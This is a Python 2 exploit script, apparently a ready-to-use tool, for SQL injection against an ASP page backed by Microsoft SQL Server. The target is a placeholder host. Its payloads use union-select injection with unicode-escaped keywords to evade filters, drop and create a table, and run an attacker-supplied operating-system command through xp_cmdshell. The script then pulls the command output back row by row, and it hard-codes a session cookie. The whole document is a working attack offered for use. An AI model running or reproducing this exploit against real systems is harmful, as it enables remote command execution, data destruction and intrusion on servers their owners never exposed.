import sys, urllib2, time, os , Queue, threading,re,string
 
def cslogo():
    print '''
  ___ ___ ____ ____ ____ __ __ _ _
 / __)/ _ \( _ \( ___)( _ \( ) /__\ ( \/ )
( (__( (_) ))(_) ))__) )___/ )(__ /(__)\ \ /
 \___)\___/(____/(____)(__) (____)(__)(__)(__)
 Name:get title exploit
 
'''
 
# show message
def msg(text, type=0):
    if type == 0:
       str_def = "[*]"
    elif type == 1:
       str_def = "[+]"
    else:
       str_def = "[-]";
    print str_def + text;
 
def find_text(text, start, end):
    regex = '%s(.*)%s' % (start, end)
    text_re = re.search(regex, text)
    if text_re is None :
        return "none"
    return text_re.group(1)
 
def gbk2utf8(text):
    data=unicode(text,"gb2312")
    return data.encode("utf-8")
 
# get url data
def get(url):
    try:
      r = urllib2.urlopen(url, timeout=20)
      return r.read()
    except :
      return "none"
 
def post(url,data):
 try:
    opener = urllib2.build_opener()
    opener.addheaders.append(('Cookie', '__utma=79235852.287466356.1385124666.1385124666.1385213546.2; __utmz=79235852.1385124666.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAQDRACBC=OJMFPBPBILEDANAEOPGAMIGL; st8id=1e1bcc1010b6de32734c584317443b31.00.cc781be5683b8a8f6de679b0911732d2; ASPSESSIONIDCQBRBCBD=CGGBLCJCFMAAGPFKJAEEHAOC; ASPSESSIONIDCQARBDBD=JLKPAILCMMBNGNGDLLPLFKGH; ASPSESSIONIDAQATDAAC=MGHBOLDDOLLGPOHMDBMDLDIL'))
    r = opener.open(url,data,timeout=30)
    return r.read();
 except urllib2.HTTPError, error:
    return error.read()
 
 
if __name__ == '__main__':
 
   cslogo()
   cmd=sys.argv[1];
   msg("mssql sql cmd exploit")
   #create thread= thread if thread< len(arr) else len(arr)
   post("http://xxx.com/news.asp","iid=100%27%20and%201=2%20%20%u0075nion%20all%20%u0073elect%20%201,2,(%u0073elect%20count(*)%20%20from%20employee),4%20;DROP%20TABLE%20xxoo;create%20table%20xxoo(id%20int%20identity(1,1),dir%20ntext);--")
   #execute
   post("http://xxx.com/news.asp","iid=100%27%20and%201=2%20%20%u0075nion%20all%20%u0073elect%20%201,2,(%u0073elect%20count(*)%20%20from%20xxoo),4%20;insert%20xxoo%20exec%20%u004daster.dbo.%u0078p_cmdshell%20'"+cmd+"'; --")
   #fetch count
   html=post("http://xxx.com/news.asp","iid=100%27%20and%201=2%20%20%u0075nion%20all%20%u0073elect%20%201,2,(%u0073elect%20count(*)%20%20from%20xxoo),4%20;--")
   i=find_text(html,'<font size=\"2\" color=\"#800000\">','</font>')
   where="%20where%20id=1),4%20;--";
   res="none";
   if i != "none" :
     msg("result rows: %s" % i);
     for t in range(int(i)):
       where="%20where%20id="+str(t)+"),4%20;--";
       html=post("http://xxx.com/news.asp","iid=100%27%20and%201=2%20%20%u0075nion%20all%20%u0073elect%20%201,2,(%u0073elect%20top%201%20dir%20from%20xxoo"+where)
       res=find_text(html,'<font size=\"2\" color=\"#800000\">','</font>')
       print res
 
 
   
